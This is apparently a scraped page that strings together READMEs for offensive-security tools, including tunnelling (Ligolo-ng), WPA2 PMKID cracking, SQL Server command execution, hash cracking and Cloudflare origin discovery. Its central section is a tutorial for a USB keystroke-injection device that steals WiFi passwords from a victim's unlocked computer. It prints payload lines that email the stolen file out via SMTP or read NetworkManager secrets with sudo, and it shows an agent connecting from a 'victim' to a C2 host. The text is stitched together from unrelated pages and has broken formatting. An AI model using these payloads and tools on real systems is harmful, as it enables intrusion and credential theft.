usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...
positional arguments:
{slack}
slack Send report to slack channel
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)
Retrieve all workflows and actions associated with the organization.
raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug
Scrape all publicly accessible GitHub repositories.
raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug
After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.
raven index --debug
Now, we can generate a report using our query library.
raven report --severity high --tag injection --tag unauthenticated
For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:
Dockerfile
(without action.yml
). Currently, this behavior isn't supported.docker://...
URL. Currently, this behavior isn't supported.data
. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}
, which creates a path for a code execution.GITHUB_ENV
. This may utilize the previous taint analysis as well.actions/github-script
has an interesting threat landscape. If it is, it can be modeled in the graph.If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll
in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert
option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile
and -keyfile
parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert
option.
The -ignore-cert
option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the
--socks ip:port
option. You can specify SOCKS credentials using the--socks-user
and--socks-pass
arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session
command to select the agent.
ligolo-ng Β» session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig
command:
[Agent : nchatelain@nworkstation] Β» ifconfig
[...]
βββββββββββββββββββββββββββββββββββββββββββββββ
β Interface 3 β
ββββββββββββββββ¬βββββββββββββββββββββββββββββββ€
β Name β wlp3s0 β
β Hardware MAC β de:ad:be:ef:ca:fe β
β MTU β 1500 β
β Flags β up|broadcast|multicast β
β IPv4 Address β 192.168.0.30/24 β
ββββββββββββββββ΄βββββββββββββββββββββββββββββββ
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx MΓ©t MTU Γtat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add
command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy
:
$ nc -lvp 4321
When a connection is made on the TCP port 1234
of the agent, nc
will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list
command and stop them using the listener_stop [ID]
command:
[Agent : nchatelain@nworkstation] Β» listener_list
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Active listeners β
βββββ¬ββββββββββββββββββββββββββ¬βββββ ββββββββββββββββββββ¬βββββββββββββββββββββββββ€
β # β AGENT β AGENT LISTENER ADDRESS β PROXY REDIRECT ADDRESS β
βββββΌββββββββββββββββββββββββββΌβββββββββββββββββββββββββΌββββββββββββββββββββββββ& #9508;
β 0 β nchatelain@nworkstation β 0.0.0.0:1234 β 127.0.0.1:4321 β
βββββ΄ββββββββββββββββββββββββββ΄βββββββββββββββββββββββββ΄βββββββββββββββββββββββββ
[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf
from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged
or -PE
to avoid false positives.
Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Uscrapper extracts the following details from the provided website:
Uscrapper 2.0:
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems
To run Uscrapper, use the following command-line syntax:
python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]
Arguments:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
This is just for understanding, both are already implemented in find_pw_chunk
and calculate_pmkid
.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
wlan_rsna_eapol.keydes.msgnr == 1
in WireShark to display only EAPOL message 1 packets.If access point is vulnerable, you should see the PMKID value like the below screenshot:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
Features:
Usage:
proxies.txt
in this format 50.168.163.176:80
How to Use:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
pip3 install -r requirements.txt
python3 PhantomCrawler.py
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
Β
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING
command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER
/SPACE
will simulate a press of keyboard keys.
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
and yours email PASSWORD
. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
ο Note:
After sending data over the email, the
.txt
file is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo |
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style
keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep
command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)
). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).*
will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt
file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
Wireless_Network_Name Password | |
--------------------- -------- | |
WLAN1 pass1 | |
WLAN2 pass2 | |
WLAN3 pass3 |
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
ο‘ Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If the Caps Lock
is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock
bug.sudo
.The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation β Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation β Part 2"
PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.
Double-click the EXE binary and you will get the list of all named pipes.
We used Visual Studio to compile it.
When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:
Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File
We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
Note that James Forshaw talked about it here.
We can't change it because we depend on third-party DLL.
We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.
Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE
for more details.
For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.
PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.
PySQLRecon can be installed with pip3 install pysqlrecon
or by cloning this repository and running pip3 install .
All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV]
require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM]
can likely be run by normal users and do not require elevated privileges.
Support for impersonation ([I]
) or execution on linked servers ([L]
) are denoted at the end of the command description.
adsi [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enu merate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]
PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:
pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]
View global options:
pysqlrecon --help
View command specific options:
pysqlrecon [GLOBAL_OPTS] COMMAND --help
Change the database authenticated to, or used in certain PySQLRecon commands (query
, tables
, columns
rows
), with the --database
flag.
Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link
flag.
Impersonate a user account while running a PySQLRecon command with the --impersonate
flag.
--link
and --impersonate
and incompatible.
pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:
git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help
PySQLRecon is easily extensible - see the template and instructions in resources
MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface
, -i
: Specify the network interface.--random
, -r
: Set a random MAC address.--newmac
, -nm
: Set a specific MAC address.--customoui
, -co
: Set a custom OUI for the MAC address.--reset
, -rs
: Reset MAC address to the original value.--version
, -V
: Show the version of the program.$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0
with your desired network interface.
You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
You can download the program from the GitHub page.
$ git clone https://github.com/HalilDeniz/NetProbe.git
To install the required libraries, run the following command:
$ pip install -r requirements.txt
To run the program, use the following command:
$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
-h
,--help
: show this help message and exit-t
,--target
: Target IP address or subnet (default: 192.168.1.0/24)-i
,--interface
: Interface to use (default: None)-l
,--live
: Enable live tracking of devices-o
,--output
: Output file to save the results-m
,--manufacturer
: Filter by manufacturer (e.g., 'Apple')-r
,--ip-range
: Filter by IP range (e.g., '192.168.1.0/24')-s
,--scan-rate
: Scan rate in seconds (default: 5)$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
NetProbe: Network Scanner Tool
options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)
$ python3 netprobe.py
You can enable live tracking of devices on your network by using the -l
or --live
flag. This will continuously update the device list every 5 seconds.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l
You can save the scan results to a file by using the -o
or --output
flag followed by the desired output file name.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
ββββββββββββββββ³ββββββββββββββββββββ³ββββββββββββββ³βββββββββββββββββββββββββββββββ
β IP Address β MAC Address β Packet Size β Manufacturer β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.1.1 β **:6e:**:97:**:28 β 102 β ASUSTek COMPUTER INC. β
β 192.168.1.3 β 00:**:22:**:12:** β 102 β InPro Comm β
β 192.168.1.2 β **:32:**:bf:**:00 β 102 β Xiaomi Communications Co Ltd β
β 192.168.1.98 β d4:**:64:**:5c:** β 102 β ASUSTek COMPUTER INC. β
β 192.168.1.25 β **:49:**:00:**:38 β 102 β Unknown β
ββββββββββββββββ΄ββββββββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββββββββββββββββ
If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:
This program is released under the MIT LICENSE. See LICENSE for more information.
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.
Key Features:
Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.
Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.
Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.
Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.
With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
- Still in the development phase, sometimes it can't detect the real Ip.
- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.
1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.
2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.
3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.
How to Use:
Run CloudScan with a single command-line argument: the target domain you want to analyze.
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
pip3 install -r requirements.txt
python cloakquest3r.py example.com
The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.
If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.
You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.
Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.
CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.
Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r
PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.Β
Clone the repository:
git clone https://github.com/HalilDeniz/PassBreaker.git
Install the required dependencies:
pip install -r requirements.txt
python passbreaker.py <password_hash> <wordlist_file> [--algorithm]
Replace <password_hash>
with the target password hash and <wordlist_file>
with the path to the wordlist file containing potential passwords.
--algorithm <algorithm>
: Specify the hash algorithm to use (e.g., md5, sha256, sha512).-s, --salt <salt>
: Specify a salt value to use.-p, --parallel
: Enable parallel processing for faster cracking.-c, --complexity
: Evaluate password complexity before cracking.-b, --brute-force
: Perform a brute force attack.--min-length <min_length>
: Set the minimum password length for brute force attacks.--max-length <max_length>
: Set the maximum password length for brute force attacks.--character-set <character_set>
: Set the character set to use for brute force attacks.Elbette! Δ°Εte Δ°ngilizce olarak yazΔ±lmΔ±Ε baΕlΔ±k ve küçük bir bilgi ile daha fazla kullanΔ±m ΓΆrneΔi:
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5
This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123
This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
